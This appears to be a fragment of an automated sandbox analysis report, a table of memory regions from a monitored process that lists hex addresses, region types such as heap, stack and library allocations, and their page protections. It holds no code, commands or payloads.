|
heap
|
page read and write
|
||
|
7610000
|
trusted library allocation
|
page read and write
|
||
|
21495668000
|
trusted library allocation
|
page read and write
|
||
|
D6D000
|
heap
|
page read and write
|
||
|
8440000
|
trusted library allocation
|
page read and write
|
||
|
21D9E000
|
stack
|
page read and write
|
||
|
2FFC000
|
stack
|
page read and write
|
||
|
DE0000
|
trusted library allocation
|
page read and write
|
||
|
1A47F381000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
8365000
|
trusted library allocation
|
page read and write
|
||
|
346F000
|
unkown
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
7763000
|
heap
|
page read and write
|
||
|
374F000
|
stack
|
page read and write
|
||
|
353E000
|
heap
|
page read and write
|
||
|
1A47E662000
|
heap
|
page read and write
|
||
|
86C2000
|
heap
|
page read and write
|
||
|
21495664000
|
trusted library allocation
|
page read and write
|
||
|
7DA1000
|
heap
|
page read and write
|
||
|
4830000
|
trusted library allocation
|
page read and write
|
||
|
21210000
|
direct allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
34B1000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
8290000
|
trusted library allocation
|
page read and write
|
||
|
ED0000
|
unkown
|
page readonly
|
||
|
2149561F000
|
trusted library allocation
|
page read and write
|
||
|
2247E000
|
heap
|
page read and write
|
||
|
7840000
|
trusted library allocation
|
page execute and read and write
|
||
|
8880000
|
direct allocation
|
page read and write
|
||
|
3054000
|
heap
|
page read and write
|
||
|
3545000
|
heap
|
page read and write
|
||
|
855C000
|
stack
|
page read and write
|
||
|
3055000
|
heap
|
page read and write
|
||
|
1A47E686000
|
heap
|
page read and write
|
||
|
6EAD000
|
stack
|
page read and write
|
||
|
21960750000
|
heap
|
page read and write
|
||
|
7412000
|
heap
|
page read and write
|
||
|
35D000
|
stack
|
page read and write
|
||
|
7DC3000
|
heap
|
page read and write
|
||
|
2B82000
|
heap
|
page read and write
|
||
|
61FC000
|
heap
|
page read and write
|
||
|
3203000
|
trusted library allocation
|
page execute and read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
25379F00000
|
heap
|
page read and write
|
||
|
CD0000
|
unkown
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
39C82000
|
system
|
page read and write
|
||
|
4BC5000
|
heap
|
page read and write
|
||
|
66D0000
|
direct allocation
|
page read and write
|
||
|
4BD4000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
715B000
|
stack
|
page read and write
|
||
|
89E000
|
heap
|
page read and write
|
||
|
2255C000
|
unclassified section
|
page execute and read and write
|
||
|
A436EFE000
|
stack
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
375F000
|
stack
|
page read and write
|
||
|
2191C000
|
stack
|
page read and write
|
||
|
86C0000
|
heap
|
page read and write
|
||
|
763D000
|
heap
|
page read and write
|
||
|
5BB6000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
E90000
|
heap
|
page read and write
|
||
|
7729000
|
heap
|
page read and write
|
||
|
4BF2000
|
heap
|
page read and write
|
||
|
2CCF000
|
unkown
|
page read and write
|
||
|
7A20000
|
direct allocation
|
page read and write
|
||
|
21493C55000
|
trusted library allocation
|
page read and write
|
||
|
D32000
|
heap
|
page read and write
|
||
|
3055000
|
heap
|
page read and write
|
||
|
8672000
|
heap
|
page read and write
|
||
|
890000
|
unkown
|
page readonly
|
||
|
C01000
|
heap
|
page read and write
|
||
|
21F40000
|
direct allocation
|
page execute and read and write
|
||
|
5501000
|
heap
|
page read and write
|
||
|
1A47E5F0000
|
heap
|
page read and write
|
||
|
82FD000
|
stack
|
page read and write
|
||
|
2B72000
|
unkown
|
page read and write
|
||
|
64A5000
|
heap
|
page read and write
|
||
|
82F0000
|
trusted library allocation
|
page read and write
|
||
|
1A47EC78000
|
heap
|
page read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
2A1E000
|
stack
|
page read and write
|
||
|
5A0E000
|
trusted library allocation
|
page read and write
|
||
|
58A1000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
4A90000
|
heap
|
page execute and read and write
|
||
|
2BA0000
|
direct allocation
|
page read and write
|
||
|
7C8000
|
stack
|
page read and write
|
||
|
7620000
|
trusted library allocation
|
page read and write
|
||
|
76E5000
|
heap
|
page read and write
|
||
|
21491C0A000
|
heap
|
page read and write
|
||
|
3890000
|
heap
|
page read and write
|
||
|
22819000
|
heap
|
page read and write
|
||
|
51C1000
|
heap
|
page read and write
|
||
|
8870000
|
direct allocation
|
page read and write
|
||
|
8566000
|
heap
|
page read and write
|
||
|
73C2000
|
heap
|
page read and write
|
||
|
4FF9000
|
trusted library allocation
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
2F6C000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
81C0000
|
trusted library allocation
|
page read and write
|
||
|
870000
|
unkown
|
page readonly
|
||
|
562C000
|
heap
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
1EB000
|
stack
|
page read and write
|
||
|
4BF4000
|
heap
|
page read and write
|
||
|
B07A000
|
direct allocation
|
page execute and read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
61F0000
|
heap
|
page read and write
|
||
|
74D7000
|
heap
|
page read and write
|
||
|
714A000
|
heap
|
page read and write
|
||
|
21BCF000
|
stack
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
2914000
|
heap
|
page read and write
|
||
|
D7000
|
unkown
|
page readonly
|
||
|
880000
|
heap
|
page read and write
|
||
|
63F0000
|
direct allocation
|
page read and write
|
||
|
222CB000
|
unclassified section
|
page execute and read and write
|
||
|
925000
|
heap
|
page read and write
|
||
|
6504000
|
heap
|
page read and write
|
||
|
4FBA000
|
trusted library allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
6FF0000
|
direct allocation
|
page read and write
|
||
|
21230000
|
direct allocation
|
page read and write
|
||
|
59E5000
|
heap
|
page read and write
|
||
|
49C0000
|
heap
|
page execute and read and write
|
||
|
1A47EC68000
|
heap
|
page read and write
|
||
|
22829000
|
heap
|
page read and write
|
||
|
4BF4000
|
heap
|
page read and write
|
||
|
78C000
|
stack
|
page read and write
|
||
|
6F10000
|
direct allocation
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
33AF000
|
stack
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
ECE000
|
stack
|
page read and write
|
||
|
214A3650000
|
trusted library allocation
|
page read and write
|
||
|
78C0000
|
trusted library allocation
|
page read and write
|
||
|
1A47EC4F000
|
heap
|
page read and write
|
||
|
C01000
|
heap
|
page read and write
|
||
|
2D1F000
|
stack
|
page read and write
|
||
|
7756000
|
heap
|
page read and write
|
There are 2095 hidden memdumps, click here to show them.